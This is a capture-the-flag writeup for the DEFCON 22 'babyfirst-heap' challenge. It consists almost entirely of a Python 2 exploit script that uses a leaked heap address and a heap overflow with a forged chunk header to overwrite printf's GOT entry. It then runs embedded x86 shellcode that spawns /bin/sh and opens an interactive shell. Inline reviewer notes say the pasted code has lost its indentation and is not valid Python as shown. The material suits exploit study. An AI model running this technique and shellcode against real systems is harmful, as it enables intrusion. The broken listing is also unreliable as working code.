[exploit] DEFCON 22 babyfirst-heap writeups
by blackcon
2014. 5. 20.
# heap overflow
# overwrite the next heap chunk
# overwrite GOT
#!/usr/bin/env python
# Exploit script from the DEFCON 22 "babyfirst-heap" writeup. Python 2
# throughout: `print` statements, str.decode('hex'), str-typed socket data.
# Flow: connect, read the allocation banner the service prints, recover a
# heap address from it, then send one oversized record that runs into the
# neighbouring chunk header so that, per the header comments above, the
# chunk metadata and then printf's GOT entry get overwritten.
# NOTE(review): the paste has lost its indentation -- the body lines after
# each `while`, after the `if` and after the `for` below are flush-left,
# and `from socket import *` is split over two lines. The code is kept
# byte-for-byte as published; as pasted it is not valid Python.
import struct, telnetlib
from socket
import *
# Pack an int as a 32-bit little-endian unsigned value (pointer/size fields).
p = lambda x: struct.pack("<I", x)
host = 'localhost'
port = 3313
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
# Read until the chunk-allocation banner shows up. Each iteration replaces
# `addr` with the latest 512-byte read, so only the most recent chunk is
# searched and kept.
addr = ''
while( addr.find("][size=260]") == -1):
addr = s.recv(512)
# Drain the service's output up to the "Write" prompt before sending.
tmp = ''
while( tmp.find("Write") == -1):
tmp = s.recv(1024)
print "## get the heap address ##"
# The service prints its own allocation addresses as
# "[ALLOC][loc=<hex>][size=260]"; that information leak is what lets the
# script use a concrete heap pointer in the payload below.
addr = addr.split("[ALLOC][loc=")[1].split("][size=260]")[0]
# Left-pad to 8 hex digits so the fixed-offset slicing below lines up.
if( len(addr) == 7 ):
addr = "0" + addr
# Turn the hex string into a 4-byte little-endian string: take the 2-char
# slices at offsets 6, 4, 2, 0 (reversed byte order) and hex-decode each.
# It is unpacked back into an int with "<L" a few lines further down.
tmp = ''
for i in range(6, -2, -2):
tmp += addr[i:i+2].decode('hex')
# x86 (32-bit) shellcode as supplied by the author; kept verbatim.
shellcode = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73"
shellcode += "\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00"
shellcode += "\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd"
shellcode += "\x80"
addr = struct.unpack("<L", tmp)[0]
# Address of printf's GOT slot in the challenge binary. Hard-coded; the
# writeup does not say how it was obtained (presumably from the binary).
printf_got = 0x804c004
#[nop][shellcode][heap_size][next_chunk][prev]
# Payload layout: NOP sled padding the 260-byte buffer, shellcode at its
# end, then a forged header for the adjacent chunk: a size field and the
# two list pointers the author labels next/prev. `printf_got - 4` is the
# value that makes the allocator's pointer write land on printf's GOT
# entry, per the "overwrite GOT" header comment.
# NOTE(review): this presupposes an allocator without safe-unlinking
# checks and a writable GOT (no full RELRO); the page does not state
# either, so confirm against the challenge binary.
payload = '\x90'*(260-len(shellcode))
payload += shellcode
payload += p(0x36d)
payload += p(addr) # next
payload += p(printf_got - 4) # prev
print "## send payload ##"
s.send(payload)
print "## get the shell ##"
# Hand the already-connected socket to telnetlib for an interactive session.
t = telnetlib.Telnet()
t.sock = s
t.interact()
s.close()